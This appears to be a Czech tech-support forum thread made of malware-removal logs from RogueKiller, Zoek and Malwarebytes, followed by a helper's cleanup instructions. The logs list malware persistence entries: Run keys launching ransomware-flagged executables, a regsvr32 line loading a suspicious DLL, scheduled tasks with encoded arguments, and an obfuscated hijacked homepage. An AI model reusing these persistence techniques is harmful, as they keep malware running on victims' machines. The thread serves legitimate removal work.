PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.ttf, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.woff, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\fonts.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\jquery-ui.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\site.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\weather.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\128x128.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\16x16.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\19x19.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\38x38.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\favicon.ico, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\pop.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_refresh_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_search_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\logo.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\m1-min.jpg, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\bootstrap.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery-ui.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.simpleWeather.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\list.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\weather.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\background.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\site.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\computed_hashes.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\verified_contents.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\main.html, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\manifest.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.MyRadioXP, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\LOCAL STORAGE\chrome-extension_fnhfdmnphmbbjbgppnpcddkefmeokfho_0.localstorage, Žádná uživatelská akce, [3243], [360496],1.0.1510
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Smazat -- Datum : 03/15/2017 20:26:18 (Duration : 00:24:48)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Smazáno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Smazáno
[Suspicious.Path] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Smazáno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> ERROR [2]
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> ERROR [2]
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Smazáno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Smazáno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Smazáno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
Zoek.exe v5.0.0.1 Updated 27-09-2015
Tool run by Nekut on 15.03.2017 at 21:00:29,42.
Microsoft Windows 10 Home 10.0.14393 x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\Nekut\Downloads\zoek.exe [Scan all users] [Script inserted]
==== System Restore Info ======================
15.03.2017 21:01:08 Zoek.exe System Restore Point Created Successfully.
==== Reset Hosts File ======================
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
==== Empty Folders Check ======================
C:\PROGRA~2\EaseUS deleted successfully
C:\PROGRA~2\GMT-MAX.ORG deleted successfully
C:\PROGRA~2\Paradox Interactive deleted successfully
C:\PROGRA~3\Comms deleted successfully
C:\PROGRA~3\iolo deleted successfully
C:\PROGRA~3\ProcessLasso deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\Users\Nekut\AppData\Local\Opera Software deleted successfully
C:\Users\Nekut\AppData\Local\Skype deleted successfully
C:\Users\Nekut\AppData\Local\Unity deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\CrashDumps deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Maps deleted successfully
==== Deleting CLSID Registry Keys ======================
==== Deleting CLSID Registry Values ======================
==== Deleting Services ======================
==== Deleting Files \ Folders ======================
C:\PROGRA~2\EaseUS not found
C:\PROGRA~2\GMT-MAX.ORG not found
C:\PROGRA~2\Paradox Interactive not found
C:\Users\Nekut\.android deleted
C:\ArchiCAD.exe deleted
C:\PROGRA~3\Package Cache deleted
C:\Users\Nekut\AppData\LocalLow\Unity deleted
C:\windows\SysNative\GroupPolicy\Machine deleted
C:\windows\SysNative\GroupPolicy\User deleted
"C:\WINDOWS\Installer\6e9261ef.msi" deleted
"C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4" deleted
"C:\Users\Nekut\AppData\Roaming\wHAbZSf" deleted
"C:\Users\Nekut\AppData\Roaming\{CEBA18AE-2A9A-6320-414B-A6E90A6F3D65}" deleted
"C:\ProgramData\0UCpIPGzc" deleted
"C:\ProgramData\2E0iHajzc" deleted
"C:\ProgramData\2STjR2fzc" deleted
"C:\ProgramData\2T8PQ0ozc" deleted
"C:\ProgramData\4cVy5Elzc" deleted
"C:\ProgramData\5mgFUcozc" deleted
"C:\ProgramData\5xH9QPIzc" deleted
"C:\ProgramData\627brqPzc" deleted
"C:\ProgramData\79J6QIPzc" deleted
"C:\ProgramData\89SWimOzc" deleted
"C:\ProgramData\aHOqXrNzc" deleted
"C:\ProgramData\ay7uDJtzc" deleted
"C:\ProgramData\bGrpTDUzc" deleted
"C:\ProgramData\BNV2z0kzc" deleted
"C:\ProgramData\brg5p4Kzc" deleted
"C:\ProgramData\by6ux00zc" deleted
"C:\ProgramData\c2WWvVnzc" deleted
"C:\ProgramData\DEBcGyrzc" deleted
"C:\ProgramData\dfIskAtzc" deleted
"C:\ProgramData\dxp37PAzc" deleted
"C:\ProgramData\e6nqO2Xzc" deleted
"C:\ProgramData\EL5rXkNzc" deleted
"C:\ProgramData\eUWHveYzc" deleted
"C:\ProgramData\Fo7vCrzzc" deleted
"C:\ProgramData\FOpfAaDzc" deleted
"C:\ProgramData\g3kq0iAzc" deleted
"C:\ProgramData\GcJ781Lzc" deleted
"C:\ProgramData\GXprCWDzc" deleted
"C:\ProgramData\H0LHhnqzc" deleted
"C:\ProgramData\hbUnwJ8zc" deleted
"C:\ProgramData\hdQdWG6zc" deleted
"C:\ProgramData\HKQht5Gzc" deleted
"C:\ProgramData\HXsvdVdzc" deleted
"C:\ProgramData\i5KKrX3zc" deleted
"C:\ProgramData\ID9HJwOzc" deleted
"C:\ProgramData\Iz4RsEczc" deleted
"C:\ProgramData\J2Y2qWczc" deleted
"C:\ProgramData\jS1ABWfzc" deleted
"C:\ProgramData\JZ8ytIqzc" deleted
"C:\ProgramData\kfS9cb0zc" deleted
"C:\ProgramData\KnVFGZjzc" deleted
"C:\ProgramData\LJCSts9zc" deleted
"C:\ProgramData\lnugmidzc" deleted
"C:\ProgramData\LTTp9sKzc" deleted
"C:\ProgramData\M6Kutuvzc" deleted
"C:\ProgramData\mBrJGWEzc" deleted
"C:\ProgramData\MdG2AtYzc" deleted
"C:\ProgramData\msfj2oozc" deleted
"C:\ProgramData\mTsKISEzc" deleted
"C:\ProgramData\N0est6Pzc" deleted
"C:\ProgramData\oonEb2Rzc" deleted
"C:\ProgramData\oq0nGfrzc" deleted
"C:\ProgramData\phsAUjwzc" deleted
"C:\ProgramData\pPzuMXRzc" deleted
"C:\ProgramData\PyeoHhtzc" deleted
"C:\ProgramData\RNvU5Cxzc" deleted
"C:\ProgramData\S6IaBoxzc" deleted
"C:\ProgramData\SeUwCOBzc" deleted
"C:\ProgramData\SLLCTC9zc" deleted
"C:\ProgramData\SPYk5ixzc" deleted
"C:\ProgramData\T3JTkRXzc" deleted
"C:\ProgramData\tIUeuvQzc" deleted
"C:\ProgramData\u4sgF2Uzc" deleted
"C:\ProgramData\U7NxdGqzc" deleted
"C:\ProgramData\Uek61kyzc" deleted
"C:\ProgramData\uFT7fi2zc" deleted
"C:\ProgramData\VPKLV6Hzc" deleted
"C:\ProgramData\wAuHjQozc" deleted
"C:\ProgramData\WMeI7DBzc" deleted
"C:\ProgramData\WnwrhQJzc" deleted
"C:\ProgramData\wpjUWBwzc" deleted
"C:\ProgramData\X3VjBkOzc" deleted
"C:\ProgramData\XVtxTxfzc" deleted
"C:\ProgramData\zDTV0xdzc" deleted
"C:\ProgramData\Zq5fWtTzc" deleted
"C:\ProgramData\ZVBDYntzc" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.key" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.pub" deleted
"C:\Users\Nekut\AppData\Roaming\iolo" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle" deleted
==== Chromium Look ======================
Google Chrome Version: 46.0.2490.86
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
efaidnbmnnnibpcajpcglclefindmkaj - No path found[]
lifbcibllhkdhoafpjfnlhfpfgnpldfl - No path found[]
internetquickaccess - Nekut\AppData\Local\Chromium\User Data\Default\Extensions\ddlhogjgfofpgmkognopimmilcldcepb
Chrome Media Router - Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
==== Chromium Fix ======================
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage-journal deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage-journal deleted successfully
==== Set IE to Default ======================
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="yes"
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157"
"Use Search Asst"="no"
==== All HKCU SearchScopes ======================
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"
==== Reset Google Chrome ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal was reset successfully
==== Deleting Registry Keys ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{28B89EEF-0004-0000-5102-CF3F3A09B77D} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
==== Empty IE Cache ======================
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
==== Empty FireFox Cache ======================
No FireFox Profiles found
==== Empty Chrome Cache ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Cache emptied successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
==== Empty All Flash Cache ======================
No Flash Cache Found
==== Empty All Java Cache ======================
No Java Cache Found
==== C:\zoek_backup content ======================
C:\zoek_backup (files=164 folders=60 1447156033 bytes)
==== Empty Temp Folders ======================
C:\WINDOWS\Temp will be emptied at reboot
==== After Reboot ======================
==== Empty Temp Folders ======================
C:\WINDOWS\Temp successfully emptied
C:\Users\Nekut\AppData\Local\Temp successfully emptied
==== Empty Recycle Bin ======================
C:\$RECYCLE.BIN successfully emptied
==== EOF on 15.03.2017 at 21:18:40,78 ======================
- jaro3
- člen Security týmu
-
Guru Level 15
- Příspěvky: 43113
- Registrován: červen 07
- Bydliště: Jižní Čechy
- Pohlaví:
- Stav:
Offline
Re: Prosím o kontrolu logu
Ten Spybot odinstaluj a nainstaluj si free antivir:
Avira , Avast , nebo Comodo.
. spusť znovu Malwarebytes' Anti-Malware a dej Skenovat nyní
- po proběhnutí programu se ti objeví hláška tak klikni na „Vše do karantény(smazat vybrané)“ a na „Exportovat záznam“ a vyber „textový soubor“ , soubor nějak pojmenuj a někam ho ulož. Zkopíruj se celý obsah toho logu.
Stáhni si Zemana AntiMalware Free z tohoto odkazu:
https://www.zemana.com/Download/AntiMal ... .Setup.exe
a ulož si ho na plochu.
Poklepej na tento soubor na ploše a postupuj podle pokynů k instalaci programu.
Přijmi licenci k používání programu EULA , pokud se nabídne.
Pokud je k dispozici aktualizace programu , klepni na tlačítko „Update now“ ( aktualizovat nyní).
Můžeš si zatrhnout i vytvoření bodu obnovy:
Klikni na ozubené kolečko , poté na „Skenování“ a zatrhni „vytvářet body obnovy“.
Vrať se zpět ( klikni na domeček).
Zavři všechny otevřené soubory, složky a prohlížeče
Neměň žádné nastavení. Klikni na „Skenovat“.
Po skenu lze vidět , zda jsou nějaké nákazy. Klikni na „Další“. Nákazy budou přemístěny do karantény.
Když je skenování dokončeno, objeví se tisková zpráva , zkopíruj sem celý obsah té zprávy.
Jinak můžeš zprávy vidět , když klikneš vpravo nahoře na „ zprávy“.
Prosím stáhni příslušnou verzi programu pro Tvůj systém 32-bit/64-bit FarbarRecovery Scan Tool (FrSt)
32bit.:
http://www.bleepingcomputer.com/downloa ... ool/dl/81/
